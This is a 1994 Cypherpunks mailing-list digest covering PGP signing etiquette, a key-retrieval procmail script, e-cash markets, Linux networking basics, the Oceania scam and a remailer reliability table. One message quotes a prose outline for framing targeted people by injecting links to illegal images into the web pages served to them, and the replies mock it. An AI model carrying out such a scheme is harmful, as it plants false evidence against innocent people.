-- Kirk, "The Menagerie", stardate 3012.4 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== This message digitally signed to verify the identity of the writer. From warlord at MIT.EDU Sun Dec 4 18:59:56 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 4 Dec 94 18:59:56 PST Subject: Well now that we're signing... In-Reply-To: Message-ID: <9412050259.AA26790@bill-the-cat.MIT.EDU> > Well folks, now that more people are signing messages, how about every once > and a while posting your key? It's kind of a drag having to hit the > keyservers. i disagree. thats exactly what the keyservers are for! there is absolutely no reason to flood mailboxes with your key, especially when anyone who is really interested in verifying your signature can get your get from the keyserver _once_, which is all that is necessary. if i already have your key, i dont _want_ to see it again! -derek From stein-c at eng.buffalo.edu Sun Dec 4 19:37:59 1994 From: stein-c at eng.buffalo.edu (Craig Steinberger) Date: Sun, 4 Dec 94 19:37:59 PST Subject: Well now that we're signing...
Message-ID: <13848.786598675@cfd20.eng.buffalo.edu> A non-text attachment was scrubbed... Name: not available Type: text/x-pgp Size: 1096 bytes Desc: not available URL: From merriman at metronet.com Sun Dec 4 20:05:03 1994 From: merriman at metronet.com (David K. Merriman) Date: Sun, 4 Dec 94 20:05:03 PST Subject: Well now that we're signing... Message-ID: <199412050405.AA03984@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- >Something I was wondering about is what should be done with >signatures that don't check out. For the most part it is due to a >bug in the signing/mailing procedure, rather than an actual spoof. >Is there an ettiquette for contacting the person who posted the >missigned message. Do people want to know if their sigs didn't >check out? > >- -Craig Well, *I'd* sure want to know.... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuKQ5cVrTvyYOzAZAQEmygP/TlT8Ivg+hh215OOVehERh14esJJBEaHI iUhA22DzjHu/IHqyLusixNSC5M7fQBiImlb1vt34HHfi6NQTSsOEjolndHv0oKtZ Yausr209SVvt8w9GoXlWORiIWpIfNlps588bvNX9mKWt/RO8a6SPipEYe3PnsecO 0gDwh0wF0pg= =WncG -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From alex at omaha.com Sun Dec 4 20:30:18 1994 From: alex at omaha.com (Alex Strasheim) Date: Sun, 4 Dec 94 20:30:18 PST Subject: backing ecash Message-ID: <199412050431.WAA00176@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- [Standard disclaimer: all of this may be based on some misunderstanding of the underlying situation on my part.] I've been thinking about what Eric and others have written about the apparent problems Digicash is having hooking up with financial partners. 
I agree that it would be encouraging if some large banks or a credit card company were on board, but I'm not sure their absence is as big of a problem for a digital currency system like Digicash as it would be for other types of systems. If a transaction system uses credit card numbers to process purchases, then you need to have either a credit card company that's willing to participate, or someone with a merchant account to submit purchases to the system. Obviously, if the credit card company doesn't want to allow the online system, they can prevent people with merchant accounts from participating, so it's important to have them onboard. But digital currency is a commodity, or at least an incredibly lifelike simulation of one. If someone's willing to make a market for it, it will have value, assuming the system's secure and the mint behaves responsibly. Suppose Digicash opened up a digital currency exchange in Amsterdam. They agree to make a market in edollars. Specifically, they agree to sell edollars for $1US, and they agree to buy edollars for $0.99. This prices are good for all time, for all comers. The promise to sell is easy to keep, because they can mint as many edollars as they want. The promise to buy is backed up by cash reserves, which they create with revenues from sales. Let's suppose, just for the sake of argument, that the currency exchange doesn't even conduct business over the net. You have to walk into a storefront in Amsterdam with a floppy disk to buy or sell edollars. Edollars would still have value here in Lincoln, NE USA. I could find a partner and set up a local currency exchange here in Lincoln; my partner would set up shop in Amsterdam. We'd offer to sell edollars for $1.01 and buy them for $0.98. We'd keep reserves of both edollars and US dollars on hand, from which we'd do our trading. If we started to run low on edollars, my partner would go to the storefront and buy some more. If we started to accumulate too many, he'd sell. 
The prices are set up so that we'd always make a profit, assuming our volume was high enough to cover expenses. Now suppose that Bob, who runs a local business here in town, wants to sell widgets over the net. He decides to use digicash software. Alice lives in Hoboken, and she wants to buy a widget. She goes to a digital currency exchange in Hoboken and buys some edollars, and then she uses her digicash client to transfer the funds to Bob at Widgets 'R Us. Every day, Bob goes to the bank and deposits the day's checks at the drive through window. Once he started selling online, he stops at my drive through window every day on the way to the bank. He gives me the edollars, and I give him a check. Then he deposits my check along with all the others at the bank. If my check is good, the bank can't say much about things one way or another. You don't need Visa or Citibank or anyone else onboard. They're not part of the loop. You just (just?) need the government to agree to stay out of the way. Now obviously, things would work a lot more smoothly if you didn't need me or my digital currency exchange. It would be nice if Bob and Alice could buy and sell edollars from their banks online. But it's not essential. I could extend credit to Alice so that she could buy edollars from me online, without having to go out and physically buy them. If Bob and I have been doing business for a while, maybe he'll trust that I'll mail him a check after he transfers edollars to me online. I suspect that if I started to make money, banks would decide to put people like me out of the business by moving into it themselves. It seems to me that one of the main strenghts of the digicash system is that it can take off slowly as more and more people decide to use it. It doesn't need to be embraced by anyone except the regulators. If it's cheaper and provides a better service, it will win. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. 
public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLuKXVBEpP7+baaPtAQEaLwP+K0MU9agIOaLb9SI9Bwv9732P5ltsdeJ5
45z2IUPzOPRJn/o+ivXJv7sjP1hIlTXMKjA2Q0Lpy2gplDIa8/cqz9WmqSku837o
nJc13tdsJevfNjtEUztC1kfrTsrZjwxW2L+hg0uL9GJSxFhU6G+eKqsXYH5nlEFZ
b1w2wFbzf5c=
=4/Jz
-----END PGP SIGNATURE-----

From adam at bwh.harvard.edu Sun Dec 4 21:53:58 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sun, 4 Dec 94 21:53:58 PST
Subject: Well now that we're signing...
In-Reply-To:
Message-ID: <199412050553.AAA25066@bwh.harvard.edu>

You wrote:

| -----BEGIN PGP SIGNED MESSAGE-----
|
|
| Well folks, now that more people are signing messages, how about every once
| and a while posting your key? It's kind of a drag having to hit the
| keyservers.

Especially when your key isn't on the servers.

The following procmail rules & shell script automatically
request keys for messages that come in signed where you don't have the
key. Doesn't address multiple keyrings. Do what you want with the
returns, I dump 'em into a folder to look at now and again. You might
pipe them to pgp -fka or somesuch.

Adam

----procmailrc--------
# auto key retrieval
:0BW
* -----BEGIN PGP
KEYID=|/usr3/adam/tmp/unknown

# I have an elm alias, pgp, points to a keyserver
:0ac
|elm -s"get $KEYID" pgp

----~/tmp/unknown------
#!/bin/sh
# $output is to get the exit status. Otherwise, this would be a one liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$?
if [ $EV -eq 0 ]; then
	echo $OUTPUT | awk '{print $6}'
fi
exit $EV

--
"It is seldom that liberty of any kind is lost all at once."
-Hume From 0003701548 at mcimail.com Sun Dec 4 22:21:46 1994 From: 0003701548 at mcimail.com (Alan Pugh) Date: Sun, 4 Dec 94 22:21:46 PST Subject: autosign designs Message-ID: <73941205062037/0003701548PJ3EM@MCIMAIL.COM> -----BEGIN PGP SIGNED MESSAGE----- >The point is that if Eric insists on arbitrary rules that >threaten the list, some bright c'punk will "write code" to circumvent >the assinine rule. Use technology to solve problems... TM> Not exactly; that's how the thought train began, but something that was TM> just for circumventing the rule would have a slightly different solution: TM> generate a new key for each post, sign with the key, and throw it away TM> (so that no information would be contained in the signature). The TM> signatures from the current system does contain some information. TM> I might yet still implement something that does the above: at this point, TM> it's pretty trivial, aside from hacking PGP to generate a key with a smaller TM> than 384-bit modulus (to conserve computrons). You might also want to check for low computron usage if you can and generate a bunch of keys for later use when the machine is fairly idle. (if it's ever in such a state - don't know if you are on a multiuser system or not). that way, during peak times, you aren't burning big-time cycles generating keys. TM> As an aside, this is my general approach to things: I'll start off in TM> a particular direction and then vary it as I think of new things. I TM> only mention it here because I often state that I'm going to do something TM> and then the result is somewhat different than my original summary. TM> I've done this a couple times here, and I'm hoping that explaining this TM> will make me appear, well, less flakey. the above is how i code. of course, i'm not a professional - just having a good time. 
=snip=

amp
<0003701548 at mcimail.com>
December 5, 1995 1:4

From jcorgan at netcom.com Sun Dec 4 22:33:41 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Sun, 4 Dec 94 22:33:41 PST
Subject: Oceania?
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I had come across a reference to this in Tim's CYPHERNOMICON.

Was this whole project a giant scam? Has this been objectively demonstrated, or just suspected/believed?

Having read the new URL this group has placed onto the Web (don't have it handy or I'd post it), it seems that the project is still alive and well, and "trying to pay off old debts."

Could someone bring me up to speed on this group? On the surface, it would seem that there is a lot in common with their objectives and the general Cypherpunks "philosophy". (quotes because I understand the diversity of thought in this group.)
=======================================================================
Johnathan Corgan       "Violence is the last refuge of the incompetent"
jcorgan at netcom.com                                     -Isaac Asimov

PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

From crawford at scruznet.com Sun Dec 4 23:41:17 1994
From: crawford at scruznet.com (Michael D. Crawford)
Date: Sun, 4 Dec 94 23:41:17 PST
Subject: Info about Linux
Message-ID: <199412050740.XAA09108@scruz.net>

Matt Bartley writes
> Michael D. Crawford writes
>> ...a serial card with a 16
>> character buffer that works just fine is available quite cheaply.
>
>Which card is this? My hacked-together clone currently has a 16550A
>card. I have had lots of RS232 problems. For example, my mouse on
>com1: doesn't seem to work in Linux's (gpm/selection).

I don't want to recommend a particular card until I've tried one myself. I'm using the old fashioned one-character-buffer card. I will ask a friend who has had some success.

Selection doesn't work at all unless you have the 1.1.something kernel or later. The 1.0 kernel that ships with Yggdrasil doesn't support selection.

The "even" numbered kernels are regarded as stable release for regular people to use. The "odd" releases, 1.1.x, are development versions that are not expected to be stable, which is why it's not what you get on Yggdrasil. Release 1.2 is coming Real Soon Now. You can get the development kernels, and I think the Y. CD has a tar file with a fairly recent 1.1.x kernel.

I also recommend using a bus mouse.
I'm using the Logitech bus mouse; I previously had used a Microsoft serial mouse. I get a lot better performance from the bus mouse - my cursor moves when I move the mouse, with much greater reliability than the serial mouse did.

(I mentioned using Linux for a firewall router)

>Could this be done via dialup? I can get into a dialup SLIP server
>which dynamically assigns addresses, and I just in the past week got
>my Linux box to connect to it.

It might be possible to make a router work on a LAN with dynamic addresses, but I doubt it. Much better would be to either apply to InterNIC for a class C network number, or ask your service provider to assign you a whole subnet of addresses for yourself (if they only do dynamic addressing, they probably won't want to do this. They may be reluctant in yielding up any of their address space in any case.)

>Also, what is the difference between a router, a gateway, and a
>firewall?

A router connects two different cables, which may be of the same or different physical media, so that IP packets can hop from one cable to another. The router also knows how to direct packets that are meant for distant destinations: it passes them on to the next router. One might connect two ethernets with a router, or an ethernet and a SLIP/PPP modem connection.

Routers are also often referred to as gateways, but I prefer the more precise meaning, in which a gateway is a machine that connects two incompatible networking protocols, by translating the higher level services. For example, there are Internet SMTP to UUCP mail gateways in every Unix box, as well as the Internet/CompuServe and Internet/AOL gateways. There are other kinds, such as the network file service gateways to allow Macintoshes to do AppleShare mounts from an NFS server - the FastPath and Gator boxes do an NFS mount from the fileserver, then act as appleshare servers. When a Mac reads a file using AppleShare, the gateway reads the file using NFS and passes along the results.
A firewall is a single point of connection between a "protected" and a "public" network. It is usually combined with a router. It uses such things as filtering packets based on protocol, port number, source and destination addresses to try to keep hackers out of a network. Services which are desired to run through the firewall, but which are risky, are handled by proxy servers on the firewall, so in this sense it is a gateway.

There is a very good book out on this topic, from the folks who maintain AT&T's firewall, entitled Firewalls and Internet Security, by William R. Cheswick and Steven M. Bellovin, ISBN 0-201-63357-4. I recommend it to anyone who runs a machine on the Internet - and to anyone who wishes to penetrate one: it has a pretty detailed guide on how to hack machines. (The authors recommend subscribing to 2600 magazine!)

You don't need to have a firewall to tighten up the security on your machine. Read this book if you're going to put a Unix box of any sort on the Internet, or you might wake up some day to find someone's erased your hard disk from the other side of the globe.

To be complete, I should also mention bridges. A bridge is a sort of primitive router, that connects two or more LAN sections. The sections have the same physical media. This is done for fault isolation, to extend the maximum cable length, to allow star topology on bus nets like ethernet, and to reduce traffic on the whole net somewhat (the bridges don't pass packets that are destined for the same cable segment that they originated on, but they do pass broadcast packets). Bridges are used in organizations that require multiple protocols on the same net (eg., AppleTalk and IP). Twisted Pair Ethernet Hubs are a sort of bridge.

There is a serious problem with bridges, in that they make the entire network appear to be on the same segment of cable to higher-level protocols, so an IP broadcast will stimulate every machine on the campus net.
When I was at CERN, working on the NA47 experiment, I would do "ruptime | grep na47" to find what workstations were lightly loaded in my building. This resulted in the central network police bearing down on my experiment's sysadmin, as my broadcasts were asking every machine in the lab - thousands! - what their load was, and they were all responding simultaneously. (In such a case it is a much better idea to use multiprotocol routers - I can't fathom why CERN doesn't do this.)

>> There is a security enhancement I mean to try once I've set up my own
>> full-time router...
>Be sure to post to comp.os.linux.announce when this is available!

I will, of course. Another idea is to foil dictionary attack on my passwd file by varying the encryption algorithm somewhat. It won't necessarily be a more secure algorithm, but to hack my password file you'd have to run a dictionary attack just for my machine.

I'm not so convinced that the Cypherpunks list wants to hear all this, but it's probably of interest to you that Linux is the cheapest way to get complete Unix/X11 development tools on a machine that you can be root on. Most of you can't edit the password file, tinker on the kernel, or reboot your campus Unix machines, but if you have at least a 386 you can do all this. If you wanted to make, say, a hardware encryption card for Unix, you'd be best off using Linux so you'll have the full kernel sources to ease writing your device driver.

Regards,

Michael D. Crawford
crawford at scruznet.com <- Please note change of address.
crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key.

From tcmay at netcom.com Mon Dec 5 00:37:50 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Mon, 5 Dec 94 00:37:50 PST
Subject: Oceania?
In-Reply-To:
Message-ID: <199412050839.AAA11133@netcom18.netcom.com>

Johnathan Corgan wrote:

> I had come across a reference to this in Tim's CYPHERNOMICON.
>
> Was this whole project a giant scam?
> Has this been objectively
> demonstrated, or just suspected/believed?
...
> Could someone bring me up to speed on this group? On the surface, it
> would seem that there is a lot in common with their objectives and the
> general Cypherpunks "philosophy". (quotes because I understand the
> diversity of thought in this group.)

I won't say it's a scam, but a lot of people think it is/was. I thought it had died some months back, when all posts (of which there had previously been many) suddenly stopped.

The idea of soliciting "contributions" to fund some kind of seagoing barge, sinkable with a single torpedo (anonymously delivered, easily enough), is crazy. If changes are going to occur, it won't be by collecting dribs and drabs of small change from suckers who think they'll someday be "living off the sea, consulting via satellite dish." (That's not a direct quote, just my gleaning of the Oceania philosophy.)

They're out to lunch, or scam artists, or hopeless dreamers, or all of the above. Gone to Roatan.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com     | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From joshua at dee.retix.com Mon Dec 5 01:30:02 1994
From: joshua at dee.retix.com (joshua geller)
Date: Mon, 5 Dec 94 01:30:02 PST
Subject: Oceania?
In-Reply-To: <199412050839.AAA11133@netcom18.netcom.com>
Message-ID: <199412050931.BAA02640@sleepy.retix.com>

I thought it was 'gone to croatoa'.

josh

From lmccarth at ducie.cs.umass.edu Mon Dec 5 02:19:36 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 5 Dec 94 02:19:36 PST
Subject: public accounts / PGP / passphrases
Message-ID: <199412051024.FAA00972@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Thanks to Derek, Jonathan, Rich, Mike Duvos, and Scott Collins for the responses to my query. It seems everyone agrees that the PGP private key is not trivially breakable without the pass phrase, so I'm keeping my pass phrase.

All of the techniques mentioned were familiar to me, except this bit from Mike Duvos:

> Given the state of Unix security, I would certainly not want to
> type my passphrase into a Unix box unless I was the only user,
> was directly connected to the box through a wire I could see, and
> had just done a fresh boot after verifying the MD5 hash on all
> the OS binaries.

Could you clarify where the `clean' copy of the hash of the OS is being stored, if not on the machine in question ?

I must confess that I'm not personally prepared to push my machine into an early grave by rebooting before I sign or encrypt anything. Besides, I'd be pushing _myself_ into an early grave if I did that. YMMV.

I have a 386 at home, on which I suppose I could run PGP, but that doesn't help. Why ? Simply because going home to dial in is a major inconvenience. Leaving aside my unwillingness to stay home in the evening just to use my public account, it's utterly impossible for me to leave work during the day whenever I want to use PGP. The only solution I can imagine is to keep a notebook computer running Linux at work, and dial in to the DECstation five feet away from my desk at work. I've no idea how to convince the tech staff here to add a dedicated phone line to my lab for this purpose. Any better suggestions on using PGP safely during the workday ?

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From lmccarth at ducie.cs.umass.edu Mon Dec 5 02:47:14 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Mon, 5 Dec 94 02:47:14 PST
Subject: making public keys public
Message-ID: <199412051051.FAA01191@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Eric Hughes writes:
> > If you're not going to make the public key public, why use public key
> > cryptography at all ? Save time and effort and use a symmetric cipher.
>
> You can't do authentication with a shared secret key, because there's
> nothing to differentiate the two sides of the link.

Is it really important to distinguish the two sides ? The additional threat is that an attacker could spoof my correspondent to me, once she's grabbed my secret key. But a) I thought we were assuming that other people being spoofed is _their_ problem, not ours, and b) if she's nabbed my key, odds are she's hacked my account anyway, leaving me with much larger problems.
> In addition, a closely held public key might be held by 10 people;

Hmm, `closely-held' suggests that the `public' key is being passed around as a secret over some channels, in which case it might as well be a secret key being passed around over those channels to the 10 people.

> with secret keys there are 90 different private keys instances to
> manage.

Wouldn't there only be 45 ? I agree that this is quite a few, but it's a reasonable tradeoff between disk space and processing speed unless you're communicating with a large number of people.

- - -L. Futplex McCarthy; PGP key by finger or server
"We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads

- --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From frissell at panix.com Mon Dec 5 04:22:00 1994
From: frissell at panix.com (Duncan Frissell)
Date: Mon, 5 Dec 94 04:22:00 PST
Subject: future entrapment
Message-ID: <199412051220.AA29286@panix.com>

>>* establish a local WWW server hosting some useful information
>>* configure the server to record the IP addresses of people who
>> access it, and cross-reference them to obtain geographical
>> locations as registered with NIC. Feed this into a GIS and
>> track local accesses.
>>* have a list of people who I want to nail.
>>* filter all HTTP requests through a script that >> - checks the list of victims >> - if a request for a file comes in from one of the >> targets, munge the outgoing web page to include >> a tag pointing to a foreign site >> carrying images deemed pornographic in my jurisdiction >> - ring the console bell >> >>As soon as someone on the hit list downloads a file, you have prima >>facie evidence that they are probably in posession of some kiddie porn. >>Instant search warrant time ... "But your Honor, I had graphics turned off for speed." "The Geheimestaat Polezi has to prove not only that I connected but that I actually got something." "Too bad my swap file is on a partition that was corrupted when the ossifers grabbed my machine." The ancient question, do you possess something if it is encoded and cannot be decoded? DCF From roy at cybrspc.mn.org Mon Dec 5 05:40:14 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Mon, 5 Dec 94 05:40:14 PST Subject: E-money Good or Bad? In-Reply-To: Message-ID: <941205.070835.9O5.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, KDAGUIO at aba.com writes: > Let me ask you a question. If people can communicate over the > net anonymously, tranmit unreadable messages, and transfer > unlimited amounts of fully anonymous money, haven't you, in > addition to protecting some of the interests of minorities, also > perfected a mechanism by which people with evil intent can engage > in criminal activities completely unobserved and with no fear of > prosecution? This has been hashed almost to death before. The use of crypto does not remove the fear of prosecution. It only makes it more difficult to intercept messages in transit. Actions at both ends of the transaction will still be visible to some extent. We don't have any duty to make law enforcement's job easier, especially at the cost of our privacy. - -- Roy M. 
Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuMR9hvikii9febJAQGegAP9H5iw3Gip8uxzZD0tnU0KjPfNRvxHx8VQ JTU3PvO1EMOrSzebI6BRdhXFMEe//tAYEe51yxK5/8s1rYGEckMETigFw2Forirf /gabSw590tFAiPd1y+l2fdishEwXx0Pc67MBj4QKwgeW40AE2/aD7RR8vHkGy4CU 60chibeOiyQ= =ZKfb -----END PGP SIGNATURE----- From jcorgan at netcom.com Mon Dec 5 06:24:34 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Mon, 5 Dec 94 06:24:34 PST Subject: Date? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Is it really Christmas eve already where you are? Hehe, you caught me fiddling with my system date to generate a 2048 bit key with PGP. Actually, if it were Christmas Eve already, that would mean that the pain of holiday shopping had already past.... ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuMiW01Diok8GKihAQFs0QP/UplPL2g2t86goL1o5xK3gkv9IM6nGeEW GCe41PX3Q4yiYkopIz+1bXe9kGYvrd9jJ0fusM9CRp+QnaiizzZxudAL7BGRlsGD 9c0jLLR9KtFmiiSQM5pgBIMEzXC3zPY+Xm+hPhV6/URx84qxrcjneOrnOJjBtjkO ekZ8ApHUhxo= =wNu9 -----END PGP SIGNATURE----- From asgaard at sos.sll.se Mon Dec 5 06:32:01 1994 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Mon, 5 Dec 94 06:32:01 PST Subject: Oceania? In-Reply-To: <199412050839.AAA11133@netcom18.netcom.com> Message-ID: Timothy C. May wrote: > They're out to lunch, or scam artists, or hopeless dreamers, or all of > the above. Gone to Roatan. Charging $250 for an Oceania passport supports the scam theory. 
Mats

From raph at CS.Berkeley.EDU Mon Dec 5 06:49:59 1994
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 5 Dec 94 06:49:59 PST
Subject: List of reliable remailers
Message-ID: <199412051450.GAA13989@kiwi.CS.Berkeley.EDU>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"jpunix"} = " cpunk pgp hash latent cut post ek";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"myriad"} = " cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";
catalyst at netcom.com is _not_ a remailer.

Last ping: Mon 5 Dec 94 6:00:01 PST

remailer  email address                     history        latency  uptime
-----------------------------------------------------------------------
xs4all    remailer at xs4all.nl              ++##******+*      7:31  99.99%
usura     usura at xs4all.nl                 ++##******-*     13:31  99.99%
alumni    hal at alumni.caltech.edu          +##**-*+*+**     11:24  99.99%
penet     anon at anon.penet.fi              +++++++++***   1:00:13  99.99%
c2        remail at c2.org                   +****-++++--     37:40  99.96%
flame     tomaz at flame.sinet.org           ***#***+*++*      8:43  99.92%
nately    remailer at nately.ucsd.edu        ++++++++++++     44:54  99.92%
portal    hfinney at shell.portal.com        ###*-******       6:46  99.85%
jpunix    remailer at jpunix.com             ###****+*++*      8:11  99.83%
vox       remail at vox.xs4all.nl            .-.--------   10:32:31  99.99%
desert    remail at desert.xs4all.nl         -----------    8:03:49  99.99%
myriad    remailer at myriad.pc.cc.cmu.edu   ###*****+**       5:11  99.70%
rahul     homer at rahul.net                 ###**** ****      4:32  99.37%
bsu-cs    nowhere at bsu-cs.bsu.edu          #*.# ** *+-*     50:33  99.05%
mix       mixmaster at nately.ucsd.edu       -+-+-            59:51  98.94%
ideath    remailer at ideath.goldenbear.com  ###**** ***       8:21  98.77%
extropia  remail at extropia.wimsey.com      +---.--+++     3:59:21  98.42%
rebma     remailer at rebma.mn.org           -_.--..*-..   22:38:33  98.13%
soda      remailer at csua.berkeley.edu      -....-.       12:55:27  86.22%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

Options and features

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
oldpgp
    Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
hash
    Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
special
    Accepts only pgp encrypted messages.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.

Comments and suggestions welcome!

Raph Levien

From PITCC05.KENNED09 at SSW.ALCOA.COM Mon Dec 5 07:12:27 1994
From: PITCC05.KENNED09 at SSW.ALCOA.COM (William A. Kennedy)
Date: Mon, 5 Dec 94 07:12:27 PST
Subject: cypher bickering
Message-ID:

internet: kenned09 at ssw.alcoa.com

I am a relatively new member to this list. There is so much potential for great discussion because the topic is technically challenging and politically sensitive. That's why it is extremely frustrating to see the list contributors, and its moderator getting all tied up in their collective underwear over whether or not the moderator can and/or force people to affix a digital signature to every posting. What's worse, they seem to stay up through the night just to bicker about it.

In the paper world, I send out many things that I don't sign. I don't sign them because it is of no significance that it be proven that I sent it. It also might be that the information is of such a general nature that it makes no neverminds who sent it. I submit that digital signatures are the same way.
But, as Tim May proposed, it could be the "secret-decoder-ring" phenomenon at work. By digitally signing all of our postings we prove that we are committed members of the "cause." But to whom are we proving our dedication? We would be demonstrating it to people who, by nature of their own interest in this list, are already committed. Oh, but wait a minute. Maybe we're afraid that people who don't even own digital signature software, are posting their ideas on our favorite subject. Isn't the posting of any ideas on cryptography by anyone more important than who's doing the posting?

From PITCC05.KENNED09 at SSW.ALCOA.COM Mon Dec 5 07:13:05 1994
From: PITCC05.KENNED09 at SSW.ALCOA.COM (William A. Kennedy)
Date: Mon, 5 Dec 94 07:13:05 PST
Subject: crypto, why not catching on?
Message-ID:

internet: kennned09 at ssw.alcoa.com

This is a response to Tim May's well-thought-out piece on "why cryptography has not caught on."

I think cryptography _has_ caught on. There are people in the crypto debate now that weren't there two years ago; perhaps even one. I think we should not measure the commitment to the cryptography debate by counting the amount of encrypted traffic. There just isn't that much that people send that needs to be encrypted. Our debate should, and does, focus on the rights of people to have the technical tools to insure the privacy of messages and other communication that they deem to be worthy of special handling.

Thanks to people like Phil Zimmermann and Romana Machado, and many others I'm sure that I don't even know about, we have those technical tools and should now be fighting for the right to use them.

Interestingly enough, I sent a message to Phil and got a response from his vacation program. In it he tells us that, if we think that our message to him needs to be encrypted, then please allow more time to get it read.
From loofbour at cis.ohio-state.edu Mon Dec 5 07:31:19 1994
From: loofbour at cis.ohio-state.edu (Nathan Loofbourrow)
Date: Mon, 5 Dec 94 07:31:19 PST
Subject: Oceania?
In-Reply-To:
Message-ID: <199412051530.KAA09905@frankenstein.cis.ohio-state.edu>

Mats Bergstrom writes:
> Timothy C. May wrote:
>
> > They're out to lunch, or scam artists, or hopeless dreamers, or all of
> > the above. Gone to Roatan.
>
> Charging $250 for an Oceania passport supports the scam theory.

